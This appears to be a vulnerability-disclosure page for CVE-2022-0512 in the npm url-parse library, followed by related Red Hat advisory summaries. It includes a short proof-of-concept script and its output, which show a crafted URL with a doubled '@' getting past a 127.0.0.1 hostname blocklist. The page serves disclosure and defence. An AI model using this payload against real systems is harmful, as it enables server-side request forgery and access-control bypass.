Headline
CVE-2022-0512: Authorization Bypass Through User-Controlled Key in url-parse
Authorization Bypass Through User-Controlled Key in NPM url-parse prior to 1.5.6.
Description
Improperly handeling username and password . And unable to detect the hostname .
Proof of Concept
url-parse not able verify basic authentication credential and also wrongly verifying hostname .This allow to bypass hostname validation .
Lets username is admin and password is password123@ and hostname is 127.0.0.1 .
so the url will be http://admin:password123@@127.0.0.1 .
And there is blacklist check for domain 127.0.0.1 and every request to 127.0.0.1 will be blocked .\
Now lets use url-parse
// PoC.js
var parse = require('url-parse')
var cc=parse("http://admin:password123@@127.0.0.1")
result
{ slashes: true,
protocol: 'http:',
hash: '',
query: '',
pathname: '/',
auth: 'admin:password123',
host: '@127.0.0.1',
port: '',
hostname: '@127.0.0.1',
password: 'password123',
username: 'admin',
origin: 'http://@127.0.0.1',
href: 'http://admin:password123@@127.0.0.1/' }
Here see its incorrretly detecting auth ,origin,password and hostname .
Here hostname check cc.hostname is @127.0.0.1 and also cc.origin is http://@127.0.0.1 which will clearly bypass above 127.0.0.1 blacklist check .
Now if you use cc.href to fetch url then it will fetch 127.0.0.1 .
Impact
Bypass hostname check
Occurrences
Related news
Dell Streaming Data Platform prior to 1.4 contains Open Redirect vulnerability. An attacker with privileges same as a legitimate user can phish the legitimate the user to redirect to malicious website leading to information disclosure and launch of phishing attacks.
Red Hat Security Advisory 2022-6429-01 - The Migration Toolkit for Containers enables you to migrate Kubernetes resources, persistent volume data, and internal container images between OpenShift Container Platform clusters, using the MTC web console or the Kubernetes API. Issues addressed include bypass, code execution, and denial of service vulnerabilities.
The Migration Toolkit for Containers (MTC) 1.7.4 is now available. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2020-28500: nodejs-lodash: ReDoS via the toNumber, trim and trimEnd functions * CVE-2021-23337: nodejs-lodash: command injection via template * CVE-2022-0512: nodejs-url-parse: authorization bypass through user-controlled key * CVE-2022-0639: npm-url-parse: Authorization Bypass Through User-Controlled Key * CVE-2022-0686: npm-url-parse: Authorization bypass thr...